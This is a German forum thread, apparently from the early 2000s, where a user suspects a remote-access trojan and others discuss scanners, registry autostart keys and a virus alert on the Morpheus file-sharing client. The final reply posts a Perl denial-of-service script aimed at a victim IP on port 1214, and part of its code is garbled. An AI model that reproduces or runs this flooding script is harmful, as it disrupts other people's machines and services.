Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

Verfolgung starten Optionen

Hilfe Hackeralarm (nur für Profis)!

gelöscht_4512 / 17 Antworten / Baumansicht Nickles

HI
Heut ist meiner Frau etwas passiert.
Auf meinem PC lief WarFTPd 1.80.05 (Dec 7 2000), ZA(Mittelstellung), AntiVir, CD-Open, FreeMem.
Als meine Frau mit M$Word arbeitete schrieb "jemand" etwas in ihren Text mit hinein und danach gingen plötzlich mehrer Fenster automatisch auf, ala "Netbus".
Hab daraufhin zig Viren- und Trojanerscanner über den PC rüberlaufen lassen, aber die haben leider nix gefunden und auch in der ZA-Leiste war kein unbekanntes Programm aufgelistet.
Hab auch keine Freigaben auf der Pladde die evtl. über Netbios gesteuert bzw. erreichbar sein könnten.

Bitte nur kompetente Antworten, kein Kiddiekram.

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

>ala "Netbus".

sagst du doch schon selber!
Es gibt mittlerweile zig Remoteserver, die an ZA vorbei arbeiten und die Antiviren- u. Trojanerscannerhersteller schlampen immer hinterher, wie man an dem Y3K Trojaner sieht!
Den Client und/oder der Serverbuilder erkennen diese Dingerchen, aber die sind es ja nicht, welche die Opfer auf ihren Kisten haben! Den packed oder unpacked server, den müssen sie erkennen und das kann die Mehrheit nicht!!!

bei Antwort benachrichtigen
gelöscht_4512 (Anonym) „ ala Netbus . sagst du doch schon selber! Es gibt mittlerweile zig Remoteserver,...“
Optionen

Hab aufgrund deines Postings auf Y3K geprüft, aber das scheint i.O. z u sein. Dieser Eintrag taucht in meiner Registry nicht auf:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
Explorer32 = C:Win98RundII.exe
siehe auch
http://www.trojaner-info.de/archiv/y3krat_11.html

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hab aufgrund deines Postings auf Y3K geprüft, aber das scheint i.O. z u sein....“
Optionen

andere Frage, war deine Frau denn online als die Symptome auftraten?

bei Antwort benachrichtigen
gelöscht_4512 (Anonym) „andere Frage, war deine Frau denn online als die Symptome auftraten?“
Optionen

Ja, sie war online
Aber es war kein Browser geöffnet.
Nur Office/M$ Word

Übriegens hab ich mir y3k runtergeladen --> mein AntiVir meldete sofort Alarm, also geh ich davon aus, dass es dieser Trojaner nicht sein wird.

bei Antwort benachrichtigen
xafford gelöscht_4512 „Ja, sie war online Aber es war kein Browser geöffnet. Nur Office/M Word...“
Optionen

klingt alles sehr seltsam
>Ja, sie war online
>Aber es war kein Browser geöffnet.
...hat sie eine verbindung hergestellt, oder ist diese von "selbst" gestartet worden?
>Win98Rundll.exe
...das ist keine normale komponente von windows, einen kleinen anhaltspunkt könntest du eventuell bekommen indem du diese datei suchst und in einem acsii-viewer (z.b. notepad) öffnest und nach ascii-zeichenfolgen suchst. die meisten programmierer hinterlassen ihre kennung oder sonstige widmungen im bytecode, eventuell auch ein generator. findest du keinerlei ascii-zeichenfolgen ist dich auch eher verdächtig.
die tatsache daß der scanner nicht anschlägt hat auch nichts zu besagen. wenn der trojaner oder was auch immer es ist neu kompiliert wurde mit geänderten routinen so stimmen auch die kriterien für die heurestische suche nach schadensroutinen nicht mehr, wenn genug geändert wurde.

Pauschalurteile sind immer falsch!!!
bei Antwort benachrichtigen
gelöscht_4512 xafford „klingt alles sehr seltsam Ja, sie war online Aber es war kein Browser geöffnet....“
Optionen

Ich glaube (hoffe) ich hab den Übeltäter gefunden
Habe heut wieder ein Update von "AntiVir" gemacht und siehe da er hat was gefunden:

--> W95/Kenny.G1
C:\Programme\Morpheus
Morpheus.exe
Enthält Signatur von W95/Kenny.G1
Datei wurde durch Virus zerstört!

Hab noch keine weiteren Infos zu diesem Virus, wer mehr dazu weiss, bitte um Verständigung und v.a. wie kommt dieses Teil auf meinem Rechner ?


bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Ich glaube hoffe ich hab den Übeltäter gefunden Habe heut wieder ein Update...“
Optionen

>wie kommt dieses Teil auf meinem Rechner ?

so wie jeder andere Virus, deine Frau oder du hat ihn installiert, da geht nun mal kein Weg dran vorbei!

bei Antwort benachrichtigen
gelöscht_4512 (Anonym) „ wie kommt dieses Teil auf meinem Rechner ? so wie jeder andere Virus, deine...“
Optionen

Nachdem ich nun die neuste Version von "Morpheus" runterlud meldete mein "AntiVir" wieder Alarm ?
http://download.cnet.com/downloads/0-1896420-108-76172.html?bt.48575.185

Hat schon mal jemand über Morpheus einen aktuellen Scanner drüberlaufen lassen ?

bei Antwort benachrichtigen
Wen interessiert das schon? gelöscht_4512 „Nachdem ich nun die neuste Version von Morpheus runterlud meldete mein AntiVir...“
Optionen

Da Morpheus ein FileSharingProgramm ist, kann es natürlich sein, daß es Codesignaturen/fragmente hat die einem Virus gleich/ähnlich sind!

Ein Viren-Scanner kann nur eben nach solchen Fingerprints in Dateien suchen, da fällt schon mal das eine oder andere "harmlose" Programm als Virus oder Trojaner auf, was es natürlich nicht ist!

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Ja, sie war online Aber es war kein Browser geöffnet. Nur Office/M Word...“
Optionen

Bei was meldet AntiVir Alarm, bei "Y3K rat 1.6.exe" und/oder "server builder.exe"?

Wenn ja, kannst das getrost in die Tonne treten, wichtig ist das es Alarm schlägt bei der *.exe die du mit dem "server builder" erzeugt hast, denn die ist es die auf den Opferrechner installiert wird und nichts anderes!

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hab aufgrund deines Postings auf Y3K geprüft, aber das scheint i.O. z u sein....“
Optionen

Es ginge auch:

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\\

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\

für jeden Trojaner!

Es wäre außerdem möglich den Trojaner durch jedes andere Windowsprogramm zu starten unabhängig von irgendwelchen Registryeinträgen!

Ich weiß nicht, vielleicht verschweigt das trojaner-info.de einfach?

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

Welches OS?

bei Antwort benachrichtigen
Anonym gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

Kauf dir ne Firewall.Die kriegst du auch für nix im Inet.Such ma nach ZoneLock oder so.
Achmed

bei Antwort benachrichtigen
(Anonym) Anonym „Kauf dir ne Firewall.Die kriegst du auch für nix im Inet.Such ma nach ZoneLock...“
Optionen

ZA ist eine Firewall ! "Zone Alarm "... :-/

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

mal ne einfache frage:haste ne funktastatur????

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

@termito
in der aktuellen Morpheus Variante gibt es keinen Virus oder Trojaner,
die meisten Antivir. Progs erkennen nur anhand von prints das es ein Virus sein könnte.

Laut dem Hersteller von Morpheus soll demnächst ein Update erfolgen, damit dies nicht mehr passieren kann.

bei Antwort benachrichtigen
(Anonym) gelöscht_4512 „Hilfe Hackeralarm (nur für Profis)!“
Optionen

morpheus is cool.
try this

#Usage: ./km.pl -h victimip

use Socket;
use Getopt::Std;

getopts("h:", \%args);

print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }

$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");

$trash="A"x100;

&exec_cmd($command);

sub exec_cmd {
for($count=1;$count {
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}

sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}

bei Antwort benachrichtigen